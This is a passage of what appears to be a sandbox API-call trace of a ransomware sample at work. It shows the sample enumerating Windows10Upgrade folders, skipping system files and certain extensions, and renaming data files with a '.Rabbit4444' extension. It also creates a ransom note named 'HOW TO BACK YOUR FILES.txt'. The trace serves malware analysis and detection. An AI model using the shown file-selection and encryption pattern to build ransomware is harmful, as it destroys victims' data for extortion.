lpString2="pagefile.sys") returned -1 [0047.784] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="boot") returned 1 [0047.784] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="ids.txt") returned -1 [0047.784] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="NTUSER.DAT") returned -1 [0047.784] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_zh-tw.htm" | out: lpString1="EULA_zh-tw.htm") returned="EULA_zh-tw.htm" [0047.784] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm", dwFileAttributes=0x0) returned 1 [0047.784] lstrlenW (lpString="EULA_zh-tw.htm") returned 14 [0047.784] lstrlenW (lpString="Rabbit4444") returned 10 [0047.784] lstrcmpiW (lpString1="_zh-tw.htm", lpString2="Rabbit4444") returned -1 [0047.784] lstrlenW (lpString=".dll") returned 4 [0047.784] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.784] lstrlenW (lpString=".lnk") returned 4 [0047.784] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.784] lstrlenW (lpString=".ini") returned 4 [0047.784] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.784] lstrlenW (lpString=".sys") returned 4 [0047.784] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.784] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.784] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.784] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13909525723) returned 1 [0047.785] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=147140) returned 1 [0047.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0047.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0047.785] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x241d0, lpName=0x0) returned 0x298 [0047.787] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x241d0) returned 0x70000 [0047.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.791] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0047.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13910255658) returned 1 [0047.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0047.792] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0047.792] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.793] CloseHandle (hObject=0x298) returned 1 [0047.793] CloseHandle (hObject=0x278) returned 1 [0047.798] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.Rabbit4444") returned 63 [0047.798] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.798] InterlockedExchangeAdd (in: Addend=0xff618, Value=147152 | out: Addend=0xff618) returned 14879840 [0047.798] InterlockedExchangeAdd (in: Addend=0xff624, Value=7 | out: Addend=0xff624) returned 3280 [0047.799] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-tw.htm", cAlternateFileName="EULA_Z~3.HTM")) returned 0 [0047.799] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0047.799] lstrcpyW (in: lpString1=0x130eb84, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.799] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.799] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.799] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.800] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.800] CloseHandle (hObject=0x278) returned 1 [0047.800] CloseHandle (hObject=0x27c) returned 1 [0047.801] GetCurrentThreadId () returned 0xd98 [0047.801] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0047.801] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\amd64", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64") returned="C:\\Windows10Upgrade\\resources\\amd64" [0047.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b330 | out: hHeap=0xe0000) returned 1 [0047.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0047.801] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\amd64" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64") returned="C:\\Windows10Upgrade\\resources\\amd64" [0047.801] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\amd64", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\") returned="C:\\Windows10Upgrade\\resources\\amd64\\" [0047.801] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3" [0047.801] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\amd64\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.805] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.808] FlushFileBuffers (hFile=0x27c) returned 1 [0047.809] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.809] CloseHandle (hObject=0x27c) returned 1 [0047.810] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\amd64") returned 35 [0047.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.810] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a5195, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5d0da0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0047.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.810] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.810] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.810] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.810] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3a5195, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe5d0da0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.810] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.810] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.810] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.811] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe5d0da0b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe5d0da0b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe5d0da0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.811] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.811] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.811] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39b5b0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39b5b0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x16ebc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BiosBlocks.xml", cAlternateFileName="BIOSBL~1.XML")) returned 1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="Rabbit4444.exe") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".") returned 1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="..") returned 1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="windows") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="bootmgr") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="pagefile.sys") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="boot") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="ids.txt") returned -1 [0047.811] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="NTUSER.DAT") returned -1 [0047.811] lstrcpyW (in: lpString1=0x130eb80, lpString2="BiosBlocks.xml" | out: lpString1="BiosBlocks.xml") returned="BiosBlocks.xml" [0047.811] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml", dwFileAttributes=0x0) returned 1 [0047.812] lstrlenW (lpString="BiosBlocks.xml") returned 14 [0047.812] lstrlenW (lpString="Rabbit4444") returned 10 [0047.812] lstrcmpiW (lpString1="Blocks.xml", lpString2="Rabbit4444") returned -1 [0047.812] lstrlenW (lpString=".dll") returned 4 [0047.812] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0047.812] lstrlenW (lpString=".lnk") returned 4 [0047.812] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0047.812] lstrlenW (lpString=".ini") returned 4 [0047.812] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0047.812] lstrlenW (lpString=".sys") returned 4 [0047.812] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0047.812] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.812] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.812] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13912318457) returned 1 [0047.812] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=93884) returned 1 [0047.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0047.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0047.813] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x171c0, lpName=0x0) returned 0x298 [0047.814] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x171c0) returned 0x70000 [0047.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.817] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.818] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13912856587) returned 1 [0047.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0047.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0047.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.819] CloseHandle (hObject=0x298) returned 1 [0047.819] CloseHandle (hObject=0x278) returned 1 [0047.822] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.Rabbit4444") returned 61 [0047.822] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml.rabbit4444"), dwFlags=0x1) returned 1 [0047.822] InterlockedExchangeAdd (in: Addend=0xff618, Value=93888 | out: Addend=0xff618) returned 15026992 [0047.822] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3287 [0047.822] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39c8ec, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39c8ec, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x11daf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwcompat.txt", cAlternateFileName="")) returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="Rabbit4444.exe") returned -1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2=".") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="..") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="windows") returned -1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="bootmgr") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="pagefile.sys") returned -1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="boot") returned 1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="ids.txt") returned -1 [0047.823] lstrcmpiW (lpString1="hwcompat.txt", lpString2="NTUSER.DAT") returned -1 [0047.823] lstrcpyW (in: lpString1=0x130eb80, lpString2="hwcompat.txt" | out: lpString1="hwcompat.txt") returned="hwcompat.txt" [0047.823] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt", dwFileAttributes=0x0) returned 1 [0047.823] lstrlenW (lpString="hwcompat.txt") returned 12 [0047.823] lstrlenW (lpString="Rabbit4444") returned 10 [0047.823] lstrcmpiW (lpString1="compat.txt", lpString2="Rabbit4444") returned -1 [0047.823] lstrlenW (lpString=".dll") returned 4 [0047.823] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0047.823] lstrlenW (lpString=".lnk") returned 4 [0047.823] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0047.823] lstrlenW (lpString=".ini") returned 4 [0047.823] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0047.823] lstrlenW (lpString=".sys") returned 4 [0047.823] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0047.824] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.824] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.824] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13913442263) returned 1 [0047.824] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=73135) returned 1 [0047.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0047.824] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x120b0, lpName=0x0) returned 0x298 [0047.825] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x120b0) returned 0x70000 [0047.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13913961648) returned 1 [0047.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0047.829] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.830] CloseHandle (hObject=0x298) returned 1 [0047.830] CloseHandle (hObject=0x278) returned 1 [0047.832] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.Rabbit4444") returned 59 [0047.832] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwcompat.txt.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwcompat.txt.rabbit4444"), dwFlags=0x1) returned 1 [0047.833] InterlockedExchangeAdd (in: Addend=0xff618, Value=73136 | out: Addend=0xff618) returned 15120880 [0047.833] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3292 [0047.833] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39dcc9, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39dcc9, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x90d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hwexclude.txt", cAlternateFileName="HWEXCL~1.TXT")) returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="Rabbit4444.exe") returned -1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2=".") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="..") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="windows") returned -1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="bootmgr") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="pagefile.sys") returned -1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="boot") returned 1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="ids.txt") returned -1 [0047.833] lstrcmpiW (lpString1="hwexclude.txt", lpString2="NTUSER.DAT") returned -1 [0047.833] lstrcpyW (in: lpString1=0x130eb80, lpString2="hwexclude.txt" | out: lpString1="hwexclude.txt") returned="hwexclude.txt" [0047.833] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt", dwFileAttributes=0x0) returned 1 [0047.834] lstrlenW (lpString="hwexclude.txt") returned 13 [0047.834] lstrlenW (lpString="Rabbit4444") returned 10 [0047.834] lstrcmpiW (lpString1="xclude.txt", lpString2="Rabbit4444") returned 1 [0047.834] lstrlenW (lpString=".dll") returned 4 [0047.834] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0047.834] lstrlenW (lpString=".lnk") returned 4 [0047.834] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0047.834] lstrlenW (lpString=".ini") returned 4 [0047.834] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0047.834] lstrlenW (lpString=".sys") returned 4 [0047.834] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0047.834] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\hwexclude.txt" (normalized: "c:\\windows10upgrade\\resources\\amd64\\hwexclude.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.834] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.834] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13914496718) returned 1 [0047.834] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2317) returned 1 [0047.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0047.834] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc10, lpName=0x0) returned 0x298 [0047.835] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc10) returned 0x70000 [0047.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 